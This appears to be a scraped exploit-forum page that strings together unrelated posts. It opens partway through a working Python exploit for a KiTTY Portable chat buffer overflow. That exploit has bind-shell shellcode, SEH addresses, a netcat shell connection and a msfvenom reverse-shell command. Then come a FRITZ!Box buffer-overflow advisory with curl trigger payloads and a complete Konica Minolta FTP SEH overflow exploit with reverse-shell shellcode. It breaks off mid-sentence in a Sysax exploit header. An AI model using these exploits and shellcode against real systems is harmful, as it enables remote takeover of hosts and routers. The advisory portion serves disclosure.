enough room to place a bigger shellcode. The final buffer jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one, and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other exploits and vulnerabilities as well. All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET. I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit. Pro & Cons: ----------- [+]: works from XP to Windows 10 as it uses addresses from the main executable [+]: not affected by system DEP/ASLR/SafeSEH as the main executable is not protected [+]: works even with small slice size below 50 bytes, instead of 118 [-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the CPU's core number. However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully. Also, for a bind shell payload, the connection is kept open even when closing the main program. [-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash. Graphical explanation: --------------------- ------------------- ------------------- ---- SHELLCODE ---- ------------------- ------------------- 1) Shellcode Slicer -> slice[1] -> slice[2] -> slice[3] 2) Buffer Builder -> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh -> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh -> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh TARGET CRASH AREA TARGET DST ADDR ----------------------- shell_copy -------------- 3) Slice Launcher -> Sends buffer[1] ------------------------>| buffer[1] (thread1) | -----> | slice[1] | <-| -> Sends buffer[2] ------------------------>| buffer[2] (thread2) | -----> | slice[2] | | -> Sends buffer[3] ------------------------>| buffer[3] (thread3) | -----> | slice[3] | | ----------------------- -------------- | | | |____________________________________| jump to rebuilt shellcode [email protected]:~$ ./kitty_chat.py 10.0.0.52 win10 KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) [*] Connecting to 10.0.0.52 [*] Sending evil buffer1... (slice 1/3) [*] Sending evil buffer2... (slice 2/3) [*] Sending evil buffer3... (slice 3/3) [*] Connecting to our shell... (UNKNOWN) [10.0.0.52] 4444 (?) open Microsoft Windows [version 10.0.10240] (c) 2015 Microsoft Corporation. Tous droits reserves. C:\kitty\App\KiTTY> """ import socket, os, time, sys, struct print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)" if len(sys.argv) < 3: print "\nUsage: kitty_chat.py <IP> <winxp|win7|win10> [no_nc|local_nc]" print "Example: kitty_chat.py 192.168.135.130 win7" print "\n Optional argument:" print "- 'no_nc' (no netcat), prevents the exploit from starting netcat." print "Useful if you are using your own shellcode." print "- 'local_nc (local netcat), binds netcat on local port 4444." print "Useful if you are using a classic reverse shell shellcode." sys.exit() host = sys.argv[1] # Remote target win = sys.argv[2] # OS # If argument "no_nc" specified, do not start netcat at the end of the exploit # If argument "local_nc" specified, bind netcat to local port 4444 # By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell) netcat = "remote" if len(sys.argv) == 4: if sys.argv[3] == "no_nc": netcat = "disabled" elif sys.argv[3] == "local_nc": netcat = "local" else: print "Unknown argument: %s" % sys.argv[3] sys.exit() # Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6 relative_jump = 0x112910E8 # = 0x0006EEC6 + 0x11222222 ; avoid NULLs slice_size = 118 # OS buffer alignement # buffer length written to memory at time of crash if win == "win7": offset = 180 elif win == "win10": offset = 196 elif win == "winxp": offset = 160 slice_size = 98 # buffer smaller on XP, slice size must be reduced else: print "Unknown OS selected: %s" % win print "Please choose 'winxp', 'win7' or 'win10'" sys.exit() # Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully # a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer # is the smallest. The shellcode was cut into 9 slices and worked perfectly :-) The same works of course # for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes # (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode: # msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c # Metasploit Bind Shell 4444 # Encoder: x86/fnstenv_mov # Bad chars: '\x00\x0a\x0d\xff' # Size: 350 bytes shellcode = ( "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9" "\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1" "\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5" "\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38" "\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85" "\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21" "\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa" "\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1" "\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85" "\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97" "\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf" "\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8" "\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06" "\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd" "\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c" "\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d" "\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66" "\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e" "\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7" "\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80" "\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89" "\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97" "\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8" "\x02\x0e\xaa\x58\xbd" ) # ############################################################################### # ** Shellcode Slicer ** # ############################################################################### # Slice our shellcode in as many parts as necessary count = 1 position = 0 remaining = len(shellcode) slice = [] total_size = 0 counter = 0 while position < len(shellcode): if remaining > (slice_size - 1): slice.append(shellcode[position:slice_size*count]) position = slice_size * count remaining = len(shellcode) - position count += 1 else: # last slice slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining)) position = len(shellcode) remaining = 0 # If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump # to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply # add a NOP slice to keep this shellcode slicer generic. if len(shellcode) < 256: slice.append('\x90' * slice_size) total_size += slice_size # Keep track of whole slices size, which may be greater than original shellcode size # if padding is needed for the last slice. Will be used to calculate a jump size later total_size += len(slice[counter]) # ############################################################################### # ** Buffer Builder ** # ############################################################################### # Prepare as many buffers as we have shellcode slices seh = '\x36\x31\x4B\x00' # 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p #seh = '\x43\x82\x4B\x00' # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p #seh = '\x0B\x34\x49\x00' # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p nseh = '\x90' * 4 # will be calculated later junk = '\x41' * 58 endmark = '\x43' * 5 # used to mark end of slice buffer = [] for index in range(len(slice)): # Slice end marker, to stop copy once reached # mov edi,0x4343XXXX shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43' shell_copy = ( # 51 bytes # Calculate shellcode src & dst address '\x8B\x5C\x24\x08' # mov ebx,[esp+8] ; retrieve nseh address ) if index < (len(slice) - 1): # sub bl,0xB2 ; calculate shellcode position from nseh shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 51 + len(nseh)) else: # last slice # sub bl,0xB1 ; calculate shellcode position from nseh shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 50 + len(nseh)) # In this exploit we retrieve an address from the main process memory, using ECX. This will be used below to calculate # shellcode destination. On other exploits, it may be necessary to use another register (or even to hardcode the address) shell_copy += ( '\x89\xCE' # mov esi,ecx ; retrieve main process memory address '\x31\xC9' # xor ecx,ecx ; will store the increment ) # Calculate shellcode destination relative to memory address retrieved above. As we ADD an address having NULLs # we store a non NULL address instead, that we SUB afterwards in the register itself if index > 0: # add esi,0x1117FED7 (+118 * x) shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump + (slice_size * index)) else: # first slice shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump) shell_copy += ( '\x81\xEE\x22\x22\x22\x11' # sub esi,0x11222222 ; calculate shellcode destination ) shell_copy += shellcode_end # mov edi,0x4343XXXX ; shellcode end mark shell_copy += ( # Shellcode copy loop '\x83\xC1\x04' # add ecx, 0x4 ; increment counter '\x83\xC6\x04' # add esi, 0x4 ; increment destination '\x8B\x14\x0B' # mov edx,[ebx+ecx] ; put shell chunk into edx '\x89\x16' # mov [esi],edx ; copy shell chunk to destination '\x39\xFA' # cmp edx,edi ; check if we reached shellcode end mark (if yes set ZF = 1) '\x75\xF1' # jne short -13 ; if ZF = 0, jump back to increment ecx ) if index < (len(slice) - 1): shell_copy += ( # infinite loop '\x90\x90\x90\x90' # nop nop nop nop ; infinite loop '\xEB\xFA\x90\x90' # jmp short -0x4 ; infinite loop ) else: # last slice # sub si,0x160 ; prepare jump address: sub len(slices) shell_copy += '\x66\x81\xEE' + struct.pack("<H", total_size - 2) shell_copy += ( '\x56' # push esi ; store full shellcode address on stack '\xC3' # ret ; jump to shellcode (we cannot us JMP or CALL as \xFF is a bad char) ) # jmp short -len(shell_copy) nseh = '\xEB' + struct.pack("<B", 254 - len(shell_copy)) + '\x90\x90' padding = '\x42' * (offset - len(slice[index]) - len(endmark) - len(shell_copy)) buffer.append(junk + padding + slice[index] + endmark + shell_copy + nseh + seh) # ############################################################################### # ** Slice Launcher ** # ############################################################################### # Send all of our buffers to the target! sock = [] print "[*] Connecting to %s" % host for index in range(len(buffer)): sock.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) try: sock[index].connect((host, 1987)) time.sleep(1) print "[*] Sending evil buffer%d... (slice %d/%d)" % (index+1, index+1, len(buffer)) sock[index].send(buffer[index]) time.sleep(1) sock[index].close() time.sleep(2) if index == (len(buffer) - 1): if netcat == "disabled": print "[*] Done." elif netcat == "local": print "\n[*] Waiting for our shell!" os.system("nc -nlvp 4444") elif netcat == "remote": # default print "\n[*] Connecting to our shell..." time.sleep(2) os.system("nc -nv " + host + " 4444") except: print "[-] Error sending buffer"
  15. Hacking

    Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow RedTeam Pentesting discovered that several models of the AVM FRITZ!Box are vulnerable to a stack-based buffer overflow, which allows attackers to execute arbitrary code on the device. Details ======= Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412, 7320/7330 (SL), 736x (SL) and 7490 Affected Versions: versions prior to 6.30 (all models) [0] Fixed Versions: >= 6.30 (all models) [0] Vulnerability Type: Buffer Overflow Security Risk: high Vendor URL: http://avm.de/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a wifi access point, routing, VoIP, NAS and DECT. More Details ============ When examining the running processes on a FRITZ!Box, it was discovered that the program dsl_control listens on TCP port 8080: # netstat -anp | grep dsl_control tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 849/dsl_control By sending an HTTP request to the service, it can be seen in the server's response that the daemon expects SOAP messages (output shortened): $ curl --silent http://fritz.box:8080/ | xmllint -format - <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope [...]> <SOAP-ENV:Body> <SOAP-ENV:Fault SOAP-ENV:encodingStyle="[...]"> <faultcode>SOAP-ENV:Client</faultcode> <faultstring>HTTP GET method not implemented</faultstring> </SOAP-ENV:Fault> </SOAP-ENV:Body> </SOAP-ENV:Envelope> After examining the dsl_control binary by using GNU strings and performing a web search for some of the resulting values, it was quickly discovered that parts of the daemon's source code can be found in the Git repository of the dd-wrt firmware[1]. In order to retrieve the list of all commands that are implemented by the daemon, the following SOAP message can be sent to the server, specifying an ifx:DslCpeCliAccess element containing an empty command element (output shortened): $ curl --silent http://fritz.box:8080/ --data ' <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]" xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command></command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope>' | xmllint -format - <?xml version="1.0" encoding="UTF-8"?> [...] <ifx:DslCpeCliAccessResponse> <result>avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit, avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig, bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs, dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg, fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang, g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr, g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg, g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg, g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg, g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg, g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg, lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg, nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg, pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs, pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg, pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg, pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg, pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg, pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg, pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg, pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg, pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg, pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg, se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, tmsg, vig, </result> </ifx:DslCpeCliAccessResponse> </SOAP-ENV:Body> </SOAP-ENV:Envelope> As can be seen in the listing, the server implements several commands. Many of them can be accessed without any authentication. One of the commands which was further examined is the 'se' or 'ScriptExecute' command. It is defined by the file dsl_cpe_cli_access.c, which registers the function DSL_CPE_CLI_ScriptExecute as the corresponding handler: [...] DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe); [...] The following listing shows dd-wrt's implementation of the command, which is also part of the file dsl_cpe_cli_access.c (shortened): DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute( DSL_int_t fd, DSL_char_t *pCommands, DSL_CPE_File_t *out) { DSL_int_t ret = 0; DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == DSL_FALSE) { return -1; } DSL_CPE_sscanf (pCommands, "%s", sFileName); [...] return 0; } As can be seen in the listing, the function first checks whether another parameter is given by calling the function DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds to call the function DSL_CPE_sscanf() in order to copy the value of the parameter pCommands to the local char array sFileName. Because the format string "%s" is provided to the DSL_CPE_sscanf() function, no restriction applies to how much data is copied to the array. Therefore, an overlong argument passed to the function may possibly exceed the array's bounds, leading to a buffer overflow. In order to verify that this is the case, the following SOAP message was stored in the file trigger.xml, containing 300 capital A characters as the argument for the 'se' command (output shortened): <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]/" xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command>se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope> Afterwards, curl was used to send the SOAP message to the service: $ curl --data @trigger.xml http://fritz.box:8080/ curl: (52) Empty reply from server As indicated by curl's output, no HTTP reply was received. Instead, the connection was closed. When accessing the device by using telnet, the following crash dump is printed when sending the request, clearly showing that the presumed buffer overflow was triggered: dsl_control[841] crashed at 41414140 [...] accessing 0x41414140 Version: 06.24 at: 2ac783d8 v0: 00000000 v1: ffffffff a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001 t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141 t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141 s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0 s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358 t8: 00000000 t9: 2ab3dc10 gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141 As seen in the crash dump, several saved registers were overwritten by the capital 'A' characters (0x41) provided in the SOAP message. Among those registers is the ra register, which stores the return address of the current function call, thus allowing an attacker to directly alter the control flow. This behaviour can be exploited in order to execute arbitrary code. Due to firewall restrictions, the service is only accessible from within the internal network connected to the FRITZ!Box. However, it is also possible to exploit this vulnerability by utilising cross-site request forgery, allowing typical "drive-by" exploitation through a user's web browser. Workaround ========== None. Fix === Affected users should upgrade to a fixed firmware version as soon as possible. Security Risk ============= After successful exploitation, attackers gain root privileges on the attacked device. This allows attackers to eavesdrop on traffic and to initiate and receive arbitrary phone calls, if the device is configured for telephony. Furthermore, backdoors may be installed to allow persistent access to the device. In order to exploit the vulnerability, attackers either need to be able to connect to the service directly, i.e. from the LAN, or indirectly via an attacker-controlled website, that is visited by a FRITZ!Box user. This website can exploit the vulnerability via cross-site request forgery, connecting to the service via the attacked user's browser. Therefore, it is estimated that the vulnerability poses a high risk. Timeline ======== 2015-02-26 Vulnerability identified 2015-03-26 CVE number requested 2015-03-26 Vendor notified 2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor 2015-06-09 Vendor released fixed public beta (7490) 2015-07-16 Vendor started releasing fixed versions (7360 and 7490) 2015-10-01 Vendor finished releasing fixed versions (other models [0]) 2015-11-27 Advisory release postponed to maximize patch distribution 2016-01-07 Advisory released References ========== [0] https://avm.de/service/sicherheitshinweise/ [1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  16. # Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow. # Date : 01/08/2016 # Author: TOMIWA. # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows 7 SP1 64bits # Listen for a reverse netcat connection on port 4444 # [email protected]:~# nc -nlvp 4444 # listening on [any] 4444 ... # connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158 # Microsoft Windows [Version 6.1.7601] # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # C:\Program Files (x86)\KONICA MINOLTA\FTP Utility> #!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2B" #msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.118 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python buf = "" buf += "\xbe\x95\x8c\xbb\x24\xdb\xdb\xd9\x74\x24\xf4\x5a\x29" buf += "\xc9\xb1\x5f\x31\x72\x14\x83\xc2\x04\x03\x72\x10\x77" buf += "\x79\x62\xe1\xae\xf6\xb1\x1e\xed\x1e\xe6\x8d\x3f\xba" buf += "\x32\xfb\x8e\x64\x74\x90\xea\x97\x1d\x7c\x89\x73\x1d" buf += "\x62\x91\x66\xa8\x21\x9a\xb7\xf6\xc8\xce\xd3\x8e\x8f" buf += "\x12\xa5\xc1\x62\x44\xeb\x33\x84\x55\x7e\xa1\xae\xc1" buf += "\x73\x50\xb4\xc6\xeb\x8a\x28\x66\x13\x8b\x8b\x42\x6d" buf += "\x5b\xa6\x63\x02\xbe\x7b\x71\xf0\xcd\x6e\x36\x8c\x69" buf += "\x3a\x7b\xc8\x03\xc7\xcf\xbe\x12\x0e\xf3\x7a\x29\xa7" buf += "\xe3\xb3\x54\xd3\x12\xd7\x99\x2c\x7e\x63\x6d\x08\x79" buf += "\x20\x29\x59\xf2\xfe\xe0\x1f\x9e\x6b\xa6\x36\x5a\x75" buf += "\x15\xd8\x5d\x8b\x65\xdb\xad\x7c\x84\xe8\x17\xac\x07" buf += "\xef\x45\x18\x29\x06\xbe\x07\x65\x68\xd5\xf9\xcb\x15" buf += "\x56\x13\x25\xa3\x72\xd0\xd7\x57\x77\xbb\x8f\x4d\x17" buf += "\xaf\xf9\x77\x53\x17\xf5\xeb\xab\xe0\x11\x1f\x88\xea" buf += "\xab\xa9\xce\x0b\x8d\x84\x8f\x76\x05\x05\xdc\x04\x0c" buf += "\x16\xc9\x84\x06\x6f\x2d\x02\x61\x59\xcd\x36\x17\x88" buf += "\xe9\x3a\x4f\x63\x9e\x61\x24\xbf\xdc\xd9\x53\x42\x1a" buf += "\xdf\xb2\x6e\xfe\xec\x8c\xf5\x6d\xeb\x74\x89\x29\x11" buf += "\x1f\x4d\x9c\xc4\x64\xb9\x8c\x54\xa3\x2c\x3f\xf4\x98" buf += "\x42\x11\xe0\x06\x32\x57\x75\xac\xaa\xec\x10\xda\x6d" buf += "\x20\x51\x57\xdd\x99\x1f\x35\x90\x23\xb6\xdb\x37\x17" buf += "\x1f\x1b\xea\xd1\x37\xc0\x88\x74\x4e\x74\xcf\x63\xb0" buf += "\x4f\xdc\x2c\x90\xe2\x08\xcd\x49\x40\x36\x1a\xfb\x18" buf += "\x29\x2b\x6f\x2e\x3c\x57\x6a\x79\xa8\xac\x49\xbe\xe7" buf += "\x2e\x48\xa0\xeb\x4f\x36\x3b\xa2\x40\xff\x9f\x21\xcd" buf += "\x8e\xb3\xdf\x92\xed\x3f\x12\x81\x1a\xba\x02\x20\x8f" buf += "\x1d\x5a\xef\xb1\xc3\xb0\x90\xed\x6a\x21\x5b\xc6\xb9" buf += "\x24\x3f\xa0\x3f\xc8\x4f\x05\xa3\xcf\x06\xa4\x06\xd5" buf += "\x8e\xd7\x3e\x11\xc4\x8c\x12\xa7\x3b\x75\x3f\xe8\xd3" buf += "\xd7\x08\x39\x83\xfa\x80\x71\x3c\x6e\x29\x8d\x5e\xcc" buf += "\xa1\xd4" #nSEH = "\xEB\x13\x90\x90" #SEH = "\x9D\x6D\x20\x12" >> 12206D9D buffer = "\x41" * 1037 + "\xeb\x0a\x90\x90" + "\x9D\x6D\x20\x12" + "\x90" *30 + buf + "D"*1955 #buffer = "\x41" * 1060 print "\sending evil buffer...." s.connect(('192.168.0.109',21)) #HARDCODED IP ADDRESS. data = s.recv(1024) s.send('USER anonymous' + '\r\n') data = s.recv(1024) s.send('PASS anonymous' + '\r\n') data = s.recv(1024) s.send('CWD ' +buffer+'\r\n') s.close
  17. # Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit # Date: 03/21/2016 # Exploit Author: Paul Purcell # Contact: ptpxploit at gmail # Vendor Homepage: http://www.sysax.com/ # Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date) # Version: Sysax Multi Server 6.50 # Tested on: Windows XP SP3 English # Category: Remote Code Execution # # Timeline: 03/11/16 Bug found # 03/14/16 Vender notified # 03/17/16 Vender acknowledges issue and publishes patch (6.51) # 03/21/16 Exploit Published # # Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on # Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the # service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_ # in 